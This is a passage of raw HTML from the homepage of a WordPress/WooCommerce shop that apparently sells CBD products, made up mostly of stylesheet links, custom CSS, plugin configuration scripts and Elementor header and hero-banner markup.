id='elementor-icons-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.18.0' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-frontend-legacy-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/css/frontend-legacy.min.css?ver=3.11.5' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.11.5' type='text/css' media='all' /> <link rel='stylesheet' id='swiper-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-69-css' href='https://shopopenmarket.com/wp-content/uploads/elementor/css/post-69.css?ver=1679310571' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-global-css' href='https://shopopenmarket.com/wp-content/uploads/elementor/css/global.css?ver=1679310572' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-2-css' href='https://shopopenmarket.com/wp-content/uploads/elementor/css/post-2.css?ver=1679310572' type='text/css' media='all' /> <link rel='stylesheet' id='hfe-widgets-style-css' href='https://shopopenmarket.com/wp-content/plugins/header-footer-elementor/inc/widgets-css/frontend.css?ver=1.6.13' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-654-css' href='https://shopopenmarket.com/wp-content/uploads/elementor/css/post-654.css?ver=1679310572' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-669-css' href='https://shopopenmarket.com/wp-content/uploads/elementor/css/post-669.css?ver=1679310572' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <link rel='stylesheet' id='simple-line-icons-wl-css' href='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/css/simple-line-icons.css?ver=2.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='htflexboxgrid-css' href='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/css/htflexboxgrid.css?ver=2.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='slick-css' href='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/css/slick.css?ver=2.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='woolentor-widgets-css' href='https://shopopenmarket.com/wp-content/plugins/woolentor-addons/assets/css/woolentor-widgets.css?ver=2.5.7' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-ekiticons-css' href='https://shopopenmarket.com/wp-content/plugins/elementskit-lite/modules/elementskit-icon-pack/assets/css/ekiticons.css?ver=2.8.5' type='text/css' media='all' /> <link rel='stylesheet' id='ekit-widget-styles-css' href='https://shopopenmarket.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/widget-styles.css?ver=2.8.5' type='text/css' media='all' /> <link rel='stylesheet' id='ekit-responsive-css' href='https://shopopenmarket.com/wp-content/plugins/elementskit-lite/widgets/init/assets/css/responsive.css?ver=2.8.5' type='text/css' media='all' /> <link rel='stylesheet' id='google-fonts-1-css' href='https://fonts.googleapis.com/css?family=Roboto%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CRoboto+Slab%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic%7CWork+Sans%3A100%2C100italic%2C200%2C200italic%2C300%2C300italic%2C400%2C400italic%2C500%2C500italic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic%2C900%2C900italic&display=auto&ver=6.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-shared-0-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver=5.15.3' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-brands-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5.15.3' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-fa-solid-css' href='https://shopopenmarket.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.3' type='text/css' media='all' /> <style type="text/css"> .scrollup-button { display: none; position: fixed; z-index: 1000; padding: 8px; cursor: pointer; bottom: 25px; right: 25px; background-color: #007cba; border-radius: 32px; -webkit-animation: display 0.5s; animation: display 0.5s; } .scrollup-button .scrollup-svg-icon { display: block; overflow: hidden; fill: #ffffff; } .scrollup-button:hover { background-color: #494949; } .scrollup-button:hover .scrollup-svg-icon { fill: #ffffff; } </style> <link rel="preconnect" href="https://fonts.gstatic.com/" crossorigin><script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'></script> <script type='text/javascript' src='https://shopopenmarket.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script> <link rel="https://api.w.org/" href="https://shopopenmarket.com/wp-json/" /><link rel="alternate" type="application/json" href="https://shopopenmarket.com/wp-json/wp/v2/pages/2" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://shopopenmarket.com/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://shopopenmarket.com/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 6.1.1" /> <meta name="generator" content="WooCommerce 7.5.1" /> <link rel="canonical" href="https://shopopenmarket.com/" /> <link rel='shortlink' href='https://shopopenmarket.com/' /> <link rel="alternate" type="application/json+oembed" href="https://shopopenmarket.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fshopopenmarket.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://shopopenmarket.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fshopopenmarket.com%2F&format=xml" /> <style id="mystickymenu" type="text/css">#mysticky-nav { width:100%; position: static; }#mysticky-nav.wrapfixed { position:fixed; left: 0px; margin-top:0px; z-index: 99990; -webkit-transition: 0.8s; -moz-transition: 0.8s; -o-transition: 0.8s; transition: 0.8s; -ms-filter:"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); opacity:1; background-color: #ffffff;}#mysticky-nav.wrapfixed .myfixed{ background-color: #ffffff; position: relative;top: auto;left: auto;right: auto;}#mysticky-nav .myfixed { margin:0 auto; float:none; border:0px; background:none; max-width:100%; }</style> <style type="text/css"> </style> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <meta name="generator" content="Elementor 3.11.5; settings: css_print_method-external, google_font-enabled, font_display-auto"> <style type="text/css" id="wp-custom-css"> /* .home.blog .site-header, .home.page:not(.page-template-template-homepage) .site-header, .home.post-type-archive-product .site-header { display: none!important; */ } .site-footer { display: none!important; } .storefront-breadcrumb{ display:none!important; } a:focus, input:focus, textarea:focus, button:focus { outline: none!important; } #mysticky-nav .myfixed { box-shadow: 0px 0px 6px 0px #919191; } #menu-item-175::before { content: "sale"; position: absolute; top: -18px; left: 38%; font-size: 11px; background: #e60e0e; color: #fff; padding: 0px 8px; letter-spacing: .5px; } #menu-item-175::after { content: ""; display: block; position: absolute; bottom: 27px; left: 53%; width: 8px; height: 8px; transform: rotate(45deg); background: #e60e0e; z-index: -1; } #menu-item-175:hover::before, #menu-item-175:hover::after{ background:#9CCC66; } #menu-item-106 .ekit-menu-nav-link::before { content: "new products"; position: absolute; top: -20px; left: 26%; background: #9CCC66; color: #fff; padding: 1px 5px; letter-spacing: .5px; font-size: 11px; } #menu-item-106 .ekit-menu-nav-link::after { content: ""; display: block; position: absolute; bottom: 27px; left: 53%; width: 8px; height: 8px; transform: rotate(45deg); background: #9CCC66; z-index: -1; } #menu-item-106 .ekit-menu-nav-link:hover::before, #menu-item-106 .ekit-menu-nav-link:hover::after { background:#e60e0e; } .shop-form .control{ margin-bottom: 10px; } .shop-form .form-control{ width: 100%; } .shop-form .form-submit { text-align:center; } .shop-form .form-submit .submit { border: 1px solid #151E48; background: transparent; padding: 6px 60px; text-transform: uppercase; letter-spacing: 2px; border-radius: 5px; } .shop-form .form-submit .submit:hover{ background:#151E48; color:#fff; cursor:pointer; } input[type="text"], input[type="number"], input[type="email"], input[type="tel"], input[type="url"], input[type="password"], input[type="search"], textarea, .input-text { padding: 6px 10px !important; background-color: transparent; color: #43454b; border: 0; -webkit-appearance: none; box-sizing: border-box; font-weight: 300 !important; letter-spacing: 1px; text-transform: capitalize; box-shadow: none !important; font-size: 15px; border-radius: 5px; border: 1px solid #151E48; } input[type="text"]:focus, input[type="number"]:focus, input[type="email"]:focus, input[type="tel"]:focus, input[type="url"]:focus, input[type="password"]:focus, input[type="search"]:focus, textarea:focus, .input-text:focus { background-color: transparent!important; } .ht-products .ht-product .ht-product-inner { border-color: #f1f1f1; border-radius: 20px; } /* child */ #shop-page .widget .widget-title, .widget .widgettitle { font-size: 1.41575em; letter-spacing: 0; border-bottom: 1px solid rgba(0, 0, 0, 0.05); padding: 0; margin-bottom: 1em; font-weight: 300; margin-top: 17px; } #shop-page ul.products li.product, ul.products .wc-block-grid__product, .wc-block-grid__products li.product, .wc-block-grid__products .wc-block-grid__product { width: 23%; float: left; margin: 0 8px 40px 8px; background: #041053; padding-bottom: 15px; border-radius: 5px; box-shadow: inset 0px 0px 4px #fff; } ul.products li.product .button, ul.products .wc-block-grid__product .button, .wc-block-grid__products li.product .button, .wc-block-grid__products .wc-block-grid__product .button { margin-bottom: 0.236em; padding: 3px 9px; font-size: 10px; text-transform: capitalize; letter-spacing: 1px; color: #fff; background: transparent; border-radius: 4px; border: 1px solid #333; } button:hover, input[type="button"]:hover, input[type="reset"]:hover, input[type="submit"]:hover, .button:hover, .widget a.button:hover { border-color:#fff!important; } #shop-page .added_to_cart.alt, .added_to_cart, .widget a.button.checkout { margin-bottom: 0.236em; padding: 3px 9px; font-size: 10px; text-transform: capitalize; letter-spacing: 1px; color: #fff; background: transparent; border-radius: 4px; border: 1px solid #333; } #shop-page .added_to_cart.alt:hover, .added_to_cart:hover, .widget a.button.checkout:hover { background-color: transparent; border-color: #fff; color: #ffffff; } #shop-page .woocommerce-loop-product__title { margin-top: 15px; color:#fff; } #shop-page .woocommerce-Price-amount.amount { color: #fff; } .site-main ul.products.columns-3 li.product { background: #151E48; padding-bottom: 10px; } ul.products .woocommerce-loop-product__title { margin-top: 15px; color: #fff; } .woocommerce-loop-category__title{ color:#fff; } mark { color: #777; } /* media */ @media only screen and (max-width: 1200px) { #shop-page ul.products li.product, ul.products .wc-block-grid__product, .wc-block-grid__products li.product, .wc-block-grid__products .wc-block-grid__product { width: 31%; margin: 0 8px 40px 8px; } } @media only screen and (max-width: 1024px) { #menu-item-175::before , #menu-item-175::after, #menu-item-106 .ekit-menu-nav-link::before , #menu-item-106 .ekit-menu-nav-link::after { display: none; } #shop-page ul.products li.product, ul.products .wc-block-grid__product, .wc-block-grid__products li.product, .wc-block-grid__products .wc-block-grid__product { width: 46%; float: left; margin: 0 8px 40px 8px; } } @media only screen and (max-width: 768px) { #shop-page .storefront-sorting { text-align: center; } } @media only screen and (max-width: 450px) { #shop-page { text-align: center; left: 0 !important; } #shop-page ul.products li.product, ul.products .wc-block-grid__product, .wc-block-grid__products li.product, .wc-block-grid__products .wc-block-grid__product { width: 80%; } } </style> <script> var woocs_is_mobile = 0; var woocs_special_ajax_mode = 0; var woocs_drop_down_view = "ddslick"; var woocs_current_currency = {"name":"CAD","rate":0.99,"symbol":"$","position":"left_space","is_etalon":1,"description":"","hide_cents":0,"hide_on_front":0,"flag":""}; var woocs_default_currency = {"name":"CAD","rate":0.99,"symbol":"$","position":"left_space","is_etalon":1,"description":"","hide_cents":0,"hide_on_front":0,"flag":""}; var woocs_redraw_cart = 1; var woocs_array_of_get = '{}'; woocs_array_no_cents = '["JPY","TWD"]'; var woocs_ajaxurl = "https://shopopenmarket.com/wp-admin/admin-ajax.php"; var woocs_lang_loading = "loading"; var woocs_shop_is_cached =0; </script></head> <body class="home page-template page-template-elementor_header_footer page page-id-2 theme-storefront-child woocommerce-no-js ehf-header ehf-footer ehf-template-storefront-child ehf-stylesheet-storefront-child woolentor_current_theme_ woolentor-empty-cart elementor-default elementor-template-full-width elementor-kit-69 elementor-page elementor-page-2 currency-cad"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-dark-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0.49803921568627" /><feFuncG type="table" tableValues="0 0.49803921568627" /><feFuncB type="table" tableValues="0 0.49803921568627" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-grayscale"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.54901960784314 0.98823529411765" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.71764705882353 0.25490196078431" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-red"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 1" /><feFuncG type="table" tableValues="0 0.27843137254902" /><feFuncB type="table" tableValues="0.5921568627451 0.27843137254902" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-midnight"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0 0" /><feFuncG type="table" tableValues="0 0.64705882352941" /><feFuncB type="table" tableValues="0 1" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-magenta-yellow"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.78039215686275 1" /><feFuncG type="table" tableValues="0 0.94901960784314" /><feFuncB type="table" tableValues="0.35294117647059 0.47058823529412" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-purple-green"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.65098039215686 0.40392156862745" /><feFuncG type="table" tableValues="0 1" /><feFuncB type="table" tableValues="0.44705882352941 0.4" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 0 0" width="0" height="0" focusable="false" role="none" style="visibility: hidden; position: absolute; left: -9999px; overflow: hidden;" ><defs><filter id="wp-duotone-blue-orange"><feColorMatrix color-interpolation-filters="sRGB" type="matrix" values=" .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 .299 .587 .114 0 0 " /><feComponentTransfer color-interpolation-filters="sRGB" ><feFuncR type="table" tableValues="0.098039215686275 1" /><feFuncG type="table" tableValues="0 0.66274509803922" /><feFuncB type="table" tableValues="0.84705882352941 0.41960784313725" /><feFuncA type="table" tableValues="1 1" /></feComponentTransfer><feComposite in2="SourceGraphic" operator="in" /></filter></defs></svg><div id="page" class="hfeed site"> <header id="masthead" itemscope="itemscope" itemtype="https://schema.org/WPHeader"> <p class="main-title bhf-hidden" itemprop="headline"><a href="https://shopopenmarket.com" title="openmarket" rel="home">openmarket</a></p> <div data-elementor-type="wp-post" data-elementor-id="654" class="elementor elementor-654"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section class="elementor-section elementor-top-section elementor-element elementor-element-7aa08227 elementor-section-stretched elementor-section-full_width elementor-hidden-phone elementor-section-height-default elementor-section-height-default" data-id="7aa08227" data-element_type="section" data-settings="{"background_background":"classic","stretch_section":"section-stretched"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-58718f04" data-id="58718f04" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-6b628058 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="6b628058" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-48c98d40" data-id="48c98d40" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-6a71b824 elementor-icon-list--layout-inline elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="6a71b824" data-element_type="widget" data-widget_type="icon-list.default"> <div class="elementor-widget-container"> <ul class="elementor-icon-list-items elementor-inline-items"> <li class="elementor-icon-list-item elementor-inline-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-instagram-1"></i> </span> <span class="elementor-icon-list-text"></span> </a> </li> <li class="elementor-icon-list-item elementor-inline-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fab fa-linkedin-in"></i> </span> <span class="elementor-icon-list-text"></span> </a> </li> <li class="elementor-icon-list-item elementor-inline-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fab fa-facebook-f"></i> </span> <span class="elementor-icon-list-text"></span> </a> </li> <li class="elementor-icon-list-item elementor-inline-item"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-gift1"></i> </span> <span class="elementor-icon-list-text">Shipping is free on all orders</span> </li> </ul> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-4afe403a" data-id="4afe403a" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-47e43485 elementor-icon-list--layout-inline elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list" data-id="47e43485" data-element_type="widget" data-widget_type="icon-list.default"> <div class="elementor-widget-container"> <ul class="elementor-icon-list-items elementor-inline-items"> <li class="elementor-icon-list-item elementor-inline-item"> <a href="http://shopopenmarket.com/cart/"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fas fa-shopping-cart"></i> </span> <span class="elementor-icon-list-text">Cart</span> </a> </li> <li class="elementor-icon-list-item elementor-inline-item"> <a href="http://shopopenmarket.com/tracking/"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="fas fa-trailer"></i> </span> <span class="elementor-icon-list-text">Track My Shipment</span> </a> </li> <li class="elementor-icon-list-item elementor-inline-item"> <a href="#"> <span class="elementor-icon-list-icon"> <i aria-hidden="true" class="icon icon-money-bag"></i> </span> <span class="elementor-icon-list-text">Dosage Guide</span> </a> </li> </ul> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-3c95976c elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="3c95976c" data-element_type="section" id="shop-header" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-64dfd86d" data-id="64dfd86d" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-457af02f elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="457af02f" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-2d39517" data-id="2d39517" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-21fcae52 elementor-widget elementor-widget-image" data-id="21fcae52" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <a href="http://shopopenmarket.com/"> <img width="648" height="199" src="https://shopopenmarket.com/wp-content/uploads/CBDlogo.png" class="attachment-large size-large wp-image-365" alt="" loading="lazy" srcset="https://shopopenmarket.com/wp-content/uploads/CBDlogo.png 648w, https://shopopenmarket.com/wp-content/uploads/CBDlogo-416x128.png 416w" sizes="(max-width: 648px) 100vw, 648px" /> </a> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-2ad5288" data-id="2ad5288" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-71391585 elementor-widget elementor-widget-ekit-nav-menu" data-id="71391585" data-element_type="widget" data-widget_type="ekit-nav-menu.default"> <div class="elementor-widget-container"> <div class="ekit-wid-con ekit_menu_responsive_tablet" data-hamburger-icon="" data-hamburger-icon-type="icon" data-responsive-breakpoint="1024"></div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-7d274f85 elementor-hidden-phone" data-id="7d274f85" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-7d7b0365 elementor-align-center elementor-tablet-align-center elementor-widget elementor-widget-button" data-id="7d7b0365" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="http://shopopenmarket.com/my-account/" class="elementor-button-link elementor-button elementor-size-xs" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">LOG IN</span> </span> </a> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-5cabfa19 elementor-hidden-phone" data-id="5cabfa19" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-6b450dc6 toggle-icon--bag-medium elementor-align-center elementor-tablet-align-right hfe-menu-cart--items-indicator-bubble elementor-widget elementor-widget-hfe-cart" data-id="6b450dc6" data-element_type="widget" data-settings="{"align":"center","toggle_button_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"align_tablet":"right","toggle_button_padding_tablet":{"unit":"px","top":"","right":"","bottom":"","left":"","isLinked":true},"toggle_button_padding_mobile":{"unit":"px","top":"","right":"","bottom":"","left":"","isLinked":true}}" data-widget_type="hfe-cart.default"> <div class="elementor-widget-container"> <div class="hfe-masthead-custom-menu-items woocommerce-custom-menu-item"> <div id="hfe-site-header-cart" class="hfe-site-header-cart hfe-menu-cart-with-border"> <div class="hfe-site-header-cart-li current-menu-item"> <div class="hfe-menu-cart__toggle elementor-button-wrapper"> <a id="hfe-menu-cart__toggle_button" href="https://shopopenmarket.com/cart/" class="elementor-button hfe-cart-container"> <span class="elementor-button-text hfe-subtotal"> <span class="woocs_special_price_code" ><span class="woocommerce-Price-amount amount"><bdi><span class="woocommerce-Price-currencySymbol">$</span> 0.00</bdi></span></span> </span> <span class="elementor-button-icon" data-counter="0"> <i class="eicon" aria-hidden="true"></i> <span class="elementor-screen-only"> Cart </span> </span> </a> </div> </div> </div> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-20 elementor-inner-column elementor-element elementor-element-67ae9a68 elementor-hidden-phone" data-id="67ae9a68" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-76822150 elementor-widget elementor-widget-elementskit-header-search" data-id="76822150" data-element_type="widget" data-widget_type="elementskit-header-search.default"> <div class="elementor-widget-container"> <div class="ekit-wid-con" > <a href="#ekit_modal-popup-76822150" class="ekit_navsearch-button ekit-modal-popup" aria-label="navsearch-button"> <i aria-hidden="true" class="icon icon-search-5"></i> </a> <!-- language switcher strart --> <!-- xs modal --> <div class="zoom-anim-dialog mfp-hide ekit_modal-searchPanel" id="ekit_modal-popup-76822150"> <div class="ekit-search-panel"> <!-- Polylang search - thanks to Alain Melsens --> <form role="search" method="get" class="ekit-search-group" action="https://shopopenmarket.com/"> <input type="search" class="ekit_search-field" placeholder="Search..." value="" name="s" /> <button type="submit" class="ekit_search-button"> <i aria-hidden="true" class="icon icon-search-5"></i> </button> </form> </div> </div><!-- End xs modal --> <!-- end language switcher strart --> </div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> </div> </div> </div> </header> <div data-elementor-type="wp-page" data-elementor-id="2" class="elementor elementor-2"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section class="elementor-section elementor-top-section elementor-element elementor-element-654d2768 elementor-section-stretched elementor-section-full_width elementor-section-height-default elementor-section-height-default" data-id="654d2768" data-element_type="section" data-settings="{"stretch_section":"section-stretched","background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-2e3136e9" data-id="2e3136e9" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-6adfe840 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="6adfe840" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-594a937b" data-id="594a937b" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div class="elementor-element elementor-element-398346aa animated-slow elementor-invisible elementor-widget elementor-widget-heading" data-id="398346aa" data-element_type="widget" data-settings="{"_animation":"fadeInLeft"}" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h4 class="elementor-heading-title elementor-size-default">100% NATURAL CBD PRODUCTS</h4> </div> </div> <div class="elementor-element elementor-element-7a36714f animated-slow elementor-invisible elementor-widget elementor-widget-heading" data-id="7a36714f" data-element_type="widget" data-settings="{"_animation":"fadeInDown","_animation_delay":2}" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">Achieve Physical <br> & Spiritual wellness</h1> </div> </div> <div class="elementor-element elementor-element-1f5655b7 animated-slow elementor-mobile-align-center elementor-invisible elementor-widget elementor-widget-button" data-id="1f5655b7" data-element_type="widget" data-settings="{"_animation":"fadeInLeft"}" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="#" class="elementor-button-link elementor-button elementor-size-sm" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">SHOP NOW</span> </span> </a> </div> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-57463706" data-id="57463706" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div 